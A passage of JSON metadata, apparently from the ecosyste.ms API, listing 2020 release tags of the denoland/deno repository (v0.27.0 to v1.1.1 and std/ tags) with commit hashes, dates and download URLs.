.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"